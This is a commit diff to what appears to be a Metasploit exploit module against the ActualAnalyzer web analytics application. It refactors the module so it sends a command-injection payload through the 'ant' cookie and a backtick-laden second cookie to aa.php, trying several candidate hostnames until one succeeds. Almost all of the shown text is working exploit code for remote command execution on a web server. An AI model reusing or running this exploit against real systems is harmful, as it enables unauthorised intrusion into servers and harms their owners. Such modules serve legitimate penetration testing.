Use list of potential analytics hosts

bcoles · bcoles · commit 55d9e9cff6ec · 2014-12-14T23:15:41.000+11:00
diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -209,32 +209,42 @@ def get_analytics_host_admin
     end
   end
 
-  def exploit
-    if datastore['ANALYZER_HOST'].blank?
-      analytics_host = get_analytics_host_code
-      analytics_host = get_analytics_host_view if analytics_host.nil?
-      analytics_host = get_analytics_host_admin if analytics_host.nil?
-      analytics_host = vhost if analytics_host.nil?
-    else
-      analytics_host = datastore['ANALYZER_HOST']
-    end
+  def execute_command(cmd, opts = { :analytics_host => vhost })
     vuln_cookies = %w(anw anm)
-    print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'aa.php'),
-      'vars_get' => { 'anp' => analytics_host },
-      'cookie' => "ant=#{payload.encoded}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
+      'vars_get' => { 'anp' => opts[:analytics_host] },
+      'cookie' => "ant=#{cmd}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
     )
     if !res
       fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out")
     elsif res.code == 302 && res.headers['Content-Type'] =~ /image/
       print_good("#{peer} - Payload sent successfully")
+      return true
     elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/
-      fail_with(Failure::BadConfig, "#{peer} - Host '#{analytics_host}' is not monitored by ActualAnalyzer. set ANALYZER_HOST to specify.")
+      vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.")
     elsif res.code == 200 && res.body =~ /Admin area<\/title>/
       fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.")
     else
       fail_with(Failure::Unknown, "#{peer} - Something went wrong")
     end
   end
+
+  def exploit
+    analytics_hosts = []
+    if datastore['ANALYZER_HOST'].blank?
+      analytics_hosts << get_analytics_host_code
+      analytics_hosts << get_analytics_host_view
+      analytics_hosts << get_analytics_host_admin
+      analytics_hosts << vhost
+      analytics_hosts << '127.0.0.1'
+      analytics_hosts << 'localhost'
+    else
+      analytics_hosts << datastore['ANALYZER_HOST']
+    end
+    analytics_hosts.uniq.each do |host|
+      vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...")
+      break if execute_command(payload.encoded, { :analytics_host => host })
+    end
+  end
 end
